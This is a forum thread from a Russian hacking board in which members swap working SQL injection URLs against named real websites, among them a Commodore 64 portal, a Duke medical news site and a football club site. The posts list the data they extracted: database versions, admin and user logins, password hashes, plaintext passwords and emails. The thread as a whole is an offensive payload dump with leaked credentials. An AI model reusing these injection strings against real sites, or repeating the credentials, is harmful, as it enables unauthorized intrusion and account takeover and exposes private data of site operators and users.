HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.11.2007, 11:02
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию

Неожиданно наткнулся ...
lemon64.com - прикольный портальчик
Код:
http://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Таблица forum_users:
логин, пасс, уровень, мыло, ася, сайт, aim, yim, msnm, occ
Код:
http://www.lemon64.com/?mainurl=http%3A//www.lemon64.com/reviews/view.php%3Fid%3D-1+union+select+1,concat_ws(0x3a,username,user_password,user_level,user_email,user_icq,user_website,user_aim,user_yim,user_msnm,user_occ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+forum_users+limit+1,1/*
Админ:
Kim Lemon:5967da78a21bd240b87d53bf568e7558
 
Ответить с цитированием

  #2  
Старый 08.11.2007, 12:31
Elvis000
Постоянный
Регистрация: 23.04.2007
Сообщений: 646
С нами: 10027046

Репутация: 1035


По умолчанию

www.ziegler-film.com

Код:
http://www.ziegler-film.com/de/et/prod.html?lang=EN&ID=9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
ver: 4.0.24_Debian-10sarge2-log
user: fml@localhost
base: ziegler

прав на чтение mysql.user нет.
 
Ответить с цитированием

  #3  
Старый 08.11.2007, 14:33
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
С нами: 10080326

Репутация: 576
По умолчанию

Код:
http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8/*
5.1.11-beta

Код:
http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(password,0x3a,user),5,6,7,8+from+mysql.user/*
root:*E372920927493C3BCEA6654A14218A59970A3D11:gfhjkm

Юзеры(пароли в чистом виде)
Код:
http://portativ.spb.ru/?page=news&id=-19'+union+select+1,2,3,concat(name,0x3a,passw,0x3a,email,0x3a),5,6,7,8+from+ph_user+limit+700,1/*
thx to F!$T
 
Ответить с цитированием

  #4  
Старый 08.11.2007, 14:53
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию

Код:
http://www.fnazca.com.br/news/news.php?id_news=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71),2,3,4,5,6,7,8/*
4.1.12-standard-log root:*542F4346222B98A7FB425DC2F817BEBE84DD56AA
Код:
http://www.poloarqdec.com.br/index.php?id=noticias&id_news=-1+union+select+1,2,3,version()/*
4.0.18'-Max'-log
Код:
http://www.somov.com.br/news_ler.php?id_news=-1+union+select+1,version(),user(),4,5,6,7,8/*
5.0.41--log somov@200.234.200.49
Код:
http://www.somov.com.br/news_ler.php?id_news=-1+union+select+1,concat(login,0x3a,senha),3,4,5,6,7,8+from+cad_administrador+limit+0,1/*
andre:mestre usadas:somov fernanda:somovfe ' or 1=1/*:123
Код:
http://www.polmozbyt.krakow.pl/index.php?m=ss&id_ma=1&id_mo=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
4.1.20-log
Код:
http://www.fsb-ae.com/projects/detail.php?id=-1+union+select+1,2,user(),version(),5,6,7,8,9,10,11,12/*&type=Landmarks
frankf4_fsbae@localhost 4.0.25-standard
Код:
http://www.fsb-ae.com/projects/detail.php?id=-1+union+select+1,2,3,concat(name,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12+from+users/*&type=Landmarks
Visual Inventor:06a80fec34e9262b:support@visualinventor.c om итд
Код:
http://ims.edu.in/course_details.aspx?id=1+or+1=@@version--
'Microsoft SQL Server 2000
Код:
http://ims.edu.in/course_details.aspx?id=1%20or%201=(select+top+1+cast(admin_id+as+nvarchar)%2B%27%3A%27%2Bcast(admin_name+as+nvarchar)%2B%27%3A%27%2Bcast(admin_pasword+as+nvarchar)%20from%20tblAdminLogin)--
'1:admin:admin'
 
Ответить с цитированием

  #5  
Старый 08.11.2007, 15:29
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию

dukemednews.org
Код:
http://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*
4.0.18:news:web@vml-news.duhs.duke.edu

root:
Код:
http://dukemednews.org/gallery/detail.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5+from+mysql.user/*
root:623460e26f081bbc
 
Ответить с цитированием

  #6  
Старый 12.11.2007, 21:33
Evgesha23
Новичок
Регистрация: 03.06.2007
Сообщений: 19
С нами: 9967417

Репутация: 6
По умолчанию

_http://www.deti.biz
Код:
http://www.deti.biz/product.php?s=1&a00=-1+union+select+concat(version(),0x3a,data base(),0x3a,us er()),2,3/*
5.0.45-community-log;detibizo_deti;detibizo_deti@localhost
Код:
http://www.deti.biz/product.php?s=1&a00=-1+union+select+TABLE_NA ME,2 ,3+from+INFO RMATION_SCHEMA.TABLES+LIMIT+94,1/*
94 таблицы
интересные:users ,users_roll ,sh_user и тд

Последний раз редактировалось Evgesha23; 12.11.2007 в 21:36..
 
Ответить с цитированием

  #7  
Старый 08.11.2007, 16:38
F!$T
Участник форума
Регистрация: 05.02.2007
Сообщений: 142
С нами: 10137926

Репутация: 995
По умолчанию

Код:
http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8+from+users/*
это для фанатов Динам0!
а вот что дальше делать я не понимаю... колонки login pass пустые
 
Ответить с цитированием

  #8  
Старый 08.11.2007, 17:27
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от F!$T  
Код:
http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8+from+users/*
это для фанатов Динам0!
а вот что дальше делать я не понимаю... колонки login pass пустые

Это походу не использующаяся табличка

вот нашел:
Код:
http://www.fcdynamo.ru/material.php?id=-651'+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+ut_users/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9  
Старый 08.11.2007, 19:22
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами: 10240623

Репутация: 79
По умолчанию

Мобильные аксесуары
Код HTML:
http://era.in.ua/line3.php?lng=ru&art=-217%20union%20select%201,2,concat(user_login,0x3b,user_passw),4,5,6,7+from+auth_users/*
Скул 5
 
Ответить с цитированием

  #10  
Старый 08.11.2007, 23:45
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

trouserpress.com
Код:
http://www.trouserpress.com/entry.php?a=8romeo_void'+union+select+1,concat_ws(char(58),version(),user(),database()),3,4+--+&tr=y
4.1.22-standard:trouserp@localhost:trouserp_trouser

hitkaraoke.com
Код:
http://www.hitkaraoke.com/category_search.asp?CATID=186+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db: HIT
user: hitusr1

AdminLogin:
login:dink911
password:sp0ng3b0b

Customers:
Email:dink911@yahoo.com
Password: dink

Админку не нашел
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.